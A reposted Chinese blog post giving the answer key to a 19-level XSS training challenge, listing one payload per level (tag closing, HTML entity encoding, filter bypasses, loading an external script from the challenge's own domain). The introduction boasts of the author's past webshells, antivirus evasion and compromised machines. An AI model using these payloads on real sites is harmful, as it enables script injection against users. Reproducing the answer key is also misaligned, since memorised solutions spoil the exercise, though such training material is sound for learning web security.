【19道XSS題目】不服來戰!(轉)


【19道XSS題目】不服來戰!

記得第一次接觸xss這個概念是在高中,那個時候和一個好基友通過黑客X檔案和黑客手冊。第一次接觸到了除了游戲以外的電腦知識,然后知道了,原來電腦除了玩游戲還可以搞這些,從此兩人一發不可收拾的愛上了玩黑這方面的東西。

現在想起來,高中時期是在08年左右,那個時候的網絡安全環境還蠻差。那個時候沒什么計算機知識,跟着雜志直接用工具跑都拿到了蠻多的webshell,后來學的多了,自己會寫一些殼過免殺,艷照門時候抓的肉雞那就不要說了,嘿嘿!

XSS具體的概念就不在這解釋了,做前端的童鞋們只要是稍微對安全這方面有過一點了解的,應該都是知道的。

這里有19道XSS的題目,網址是神通廣大的“QQ群爸爸”給的。大家如果想加深對XSS這方面的了解,可以來挑戰一下。看看能過幾關斬幾將!

挑戰請搓下面網址:

https://xss.haozi.me/

 答案在下面給到,主要的思路大概是以下幾種:

1.layload外部js

2.繞過正則

3.閉合標簽

4.轉化編碼:10HEX,16HEX etc.

5.創建錯誤執行Js

---------------------------------------------------                  我是分割線                         答案在下面                  ---------------------------------------------------------------------

 

 

 

 

 

 

 

 

 

 

 

0x00:<script>alert(1)</script>

0x01:</textarea><script>alert(1)</script>

0x02:"><script>alert(1)</script>

0x03:<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

0x04:<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

0x05:--!><script>alert(1)</script>

0x06:type="image" src="xxx" onerror

         ="alert(1)"

0x07:<body onload=alert(1)    CRLF結尾

0x08:</style /><script>alert(1)</script>

0x09:https://www.segmentfault.com.haozi.me/j.js

0x0A:https://www.segmentfault.com.haozi.me/j.js

0x0B:<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0C:<scripscriptt src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>

0x0D:

          alert(1);

          -->

0x0E:<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0F:');alert('1

0x10:eval("alert(1)");

0x11:"),alert("1

0x12:

</script>
<script>
alert(1);
</script>
<script>

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM